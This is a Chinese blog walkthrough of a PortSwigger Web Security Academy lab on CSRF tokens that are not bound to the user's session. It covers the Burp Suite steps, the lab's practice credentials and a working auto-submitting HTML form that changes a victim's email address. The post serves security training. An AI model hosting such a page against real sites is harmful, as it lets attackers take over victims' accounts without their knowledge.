Lab: CSRF where token is not tied to user session:CSRF,其中令牌与用户会话无关

最新推荐文章于 2024-07-17 09:37:43 发布
最新推荐文章于 2024-07-17 09:37:43 发布
阅读量315 收藏
点赞数
文章标签: 安全 html http java session
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793724
版权

本实验室的电子邮件更改功能易受 CSRF 攻击。它使用令牌来尝试防止 CSRF 攻击,但它们没有集成到站点的会话处理系统中。

要解决该实验,请使用您的漏洞利用服务器托管一个 HTML 页面,该页面使用CSRF 攻击来更改查看者的电子邮件地址。

您在应用程序上有两个帐户,可用于帮助设计攻击。凭据如下:

wiener:peter
carlos:montoya

CSRF 令牌不绑定到用户会话

某些应用程序不会验证令牌是否与发出请求的用户属于同一会话。相反,应用程序维护一个它已发行的全局令牌池,并接受出现在该池中的任何令牌。

在这种情况下,攻击者可以使用自己的帐户登录应用程序,获取有效的令牌,然后在 CSRF 攻击中将该令牌提供给受害用户。image
使用您的浏览器通过 Burp Suite 代理流量,登录您的帐户,提交“更新电子邮件”表单,并拦截由此产生的请求。
记下CSRF 令牌的值,然后删除请求。
打开一个私人/隐身浏览器窗口,登录到您的另一个帐户,然后将更新电子邮件请求发送到 Burp Repeater。image
请注意,如果您将 CSRF 令牌与其他帐户的值交换,则该请求将被接受。
把下面的代码放到服务器
代码内容:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://aca81f421ff8845b80496c0d005500d4.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ExtArE&#64;qq&#46;com" />
      <input type="hidden" name="csrf" value="HxJzDofFGkr67rPbKYMun2ZqChlB0vw4" />
    </form>
<script>
      document.forms[0].submit();
</script>
  </body>
</html>

注意:csrf只能用一次,所以我们需要修改邮箱的时候阻断报文的传输
然后将其没用过的csrf复制到代码中
存储漏洞,然后单击“交付给受害者”以解决实验室问题。
所以这玩意是跨平台的:image

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【漏洞挖掘】——40、 CSRF攻防对抗(中)
Fly_鹏程万里
06-07 24
部分应用程序不会验证Token是否与发出请求的用户属于同一个会话,相反应用程序维护一个它已经发布的全局Token池并接受该池中出现的任何令牌,在这种情况下攻击者可以使用自己的帐户登录应用程序并获取有效的token,然后在CSRF攻击中将该token提供给受害用户在上述漏洞的变体中一些应用程序将CSRF token绑定到cookie,但不绑定到用于跟踪会话的同一cookie,当应用程序采用两个不同的框架(一个用于会话处理,一个用于CSRF保护)而这两个框架没有集成在一起时就很容易发生这种情况。
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 1545
该文章为portswigger中CSRF中绕过token篇。
靶场:csrf绕过手法1(session验证相关)
kiwi的博客
03-26 482
本次的带来的是这三个靶场csrf的防御措施为在数据包当中(非cookie)当中传入一个令牌,攻击者是无法知道此令牌的。
Lab: CSRF where token is tied to non-session cookie:CSRF,其中令牌与非会话 cookie 相关联...
Zeker62的博客
08-26 574
CSRF 令牌绑定到非会话 cookie 在上述漏洞的变体中,某些应用程序确实将 CSRF 令牌绑定到 cookie,但与用于跟踪会话的 cookie 不同。当应用程序使用两种不同的框架时,这很容易发生,一种用于会话处理,一种用于 CSRF 保护,它们没有集成在一起: POST /email/change HTTP/1.1 Host: vulnerable-website.com Content...
Lab: CSRF where token is duplicated in cookie CSRF,其中令牌在 cookie 中重复
Zeker62的博客
08-26 332
CSRF 令牌简单地复制到 cookie 中 在上述漏洞的进一步变体中,一些应用程序不维护任何已发布令牌的服务器端记录,而是在 cookie 和请求参数中复制每个令牌。在验证后续请求时,应用程序只需验证请求参数中提交的令牌是否与 cookie 中提交的值匹配。这有时被称为针对 CSRF 的“双重提交”防御,并且被提倡是因为它易于实现并且避免了任何服务器端状态的需要: POST /email/ch...
CSRF(Cross-Site Request Forgery) 跨站请求伪造
Eason_LYC安全白帽子的成长博客
05-13 1568
WEB安全CSRF漏洞攻击最为全面的知识点总结,直击核心知识点,将零散的知识汇总梳理。为深入学习CSRF打下良好基础!
解决Django提交表单报错:CSRF token missing or incorrect的问题
12-20
用户提交表单时,Django会检查表单中提供的CSRF令牌是否与Cookie中的令牌匹配,如果匹配,则认为请求是安全的,否则会抛出"CSRF token missing or incorrect"的错误。 解决这个错误的方法通常涉及以下几个步骤: ...
csurf:CSRF令牌中间件
02-04
冲浪 Node.js 保护中间件。 需要首先初始化会话中间件或。... 该中间件添加了一个req.csrfToken()函数以创建一个令牌,该令牌应添加到在隐藏的表单字段,查询字符串等中改变状态的请求中。此令牌针对访问者的会话
csrfCSRF令牌创建和验证背后的逻辑
02-19
CSRF令牌创建和验证背后的逻辑。 阅读了解更多关于CSRF的信息。 使用此模块可以创建自定义CSRF中间件。 是否正在为使用该模块的最喜欢的框架寻找CSRF框架? 快速/连接: 或 Koa: 或 安装 $ npm install csrf ...
csrf-tokenservice:无状态CSRF(跨站请求伪造)令牌服务
04-28
CSRF \ TokenService 无状态CSRF(跨站请求伪造)令牌服务 :meat_on_bone: 安装 $ composer require schnittstabil/csrf-tokenservice 用法 <?php require __DIR__. '/vendor/autoload.php' ; use Schnittstabil...
PortSwigger Academy | Cross-site request forgery (CSRF) : 跨站请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1097
文章目录什么是CSRFCSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
(三)CSRF实例
weixin_43047908的博客
04-12 527
CSRF vulnerability with no defenses 电子邮件更改功能容易受到CSRF的攻击。 通过Burp Suite代理访问流量,登录到帐户,更新电子邮件,然后在代理历史记录中查找结果请求。 构造Poc: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')&lt
CSRF、Cookie、Sessiontoken之间不得不说得那些事儿
besmarterbestronger的博客
10-14 5180
文章目录1. 前言2. 什么是crsf?如何防止3. 什么是cookie?有什么用?机制?4. 什么是session?有什么用?机制?5. 什么是token?有什么用?为什么能防止csrf?6. 总结7. 参考文献 1. 前言 2. 什么是crsf?如何防止 3. 什么是cookie?有什么用?机制? 4. 什么是session?有什么用?机制? 5. 什么是token?有什么用?为什么能防止cs...
CSRF(跨站请求伪造)
qq_56289291的博客
07-28 820
攻击者可以使用自己的帐户登录到应用程序,获取有效的令牌和关联的cookie,利用cookie设置行为将其cookie放入受害者的浏览器中,并在CSRF攻击中将其令牌提供给受害者。他们只是发明了一个令牌(如果正在检查,可能是所需的格式),利用cookie设置行为将他们的cookie放入受害者的浏览器中,并在他们的CSRF攻击中将他们的令牌提供给受害者。在此情况下,攻击者可以使用自己的帐户登录到应用程序,获取有效令牌,然后在其CSRF攻击中将该令牌提供给受害者用户。顾名思义,没有任何防御CSRF的措施。...
捷配总结的SMT工厂安全防静电规则
最新发布
tyymm的博客
07-17 488
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1239
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1012
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 802
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
飞睿智能UWB Tag蓝牙防丢器标签,宠物安全新升级,5cm精准定位测距不迷路
m0_59195407的博客
07-16 612
这意味着,无论你的宠物是在家中的某个角落捉迷藏,还是在公园的人海中穿梭,飞睿智能UWB Tag都能迅速锁定其位置,让你轻松找到它。想象一下,当晨光初破晓,你带着心爱的宠物踏上晨跑的旅程,手中轻轻握着的,不仅是牵引绳,更是对宠物安全的满满承诺。想象一下,即使在外忙碌,只需轻点手机,就能掌握宠物的一切动态,这种安心与便利,是任何传统防丢手段都无法比拟的。飞睿智能UWB Tag蓝牙防丢器,以其精准的定位、智能的功能、耐用的品质,成为了守护宠物安全的得力助手。用户见证:口碑的力量,爱的传递。
"detail": "CSRF Failed: CSRF token missing."
11-05
用户提交表单时,Django会检查表单中的CSRF token是否与cookies中的CSRF token匹配,以确保请求是合法的。如果请求中缺少或错误地提供了CSRF token,则会出现"CSRF Failed: CSRF token missing."这个错误提示。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值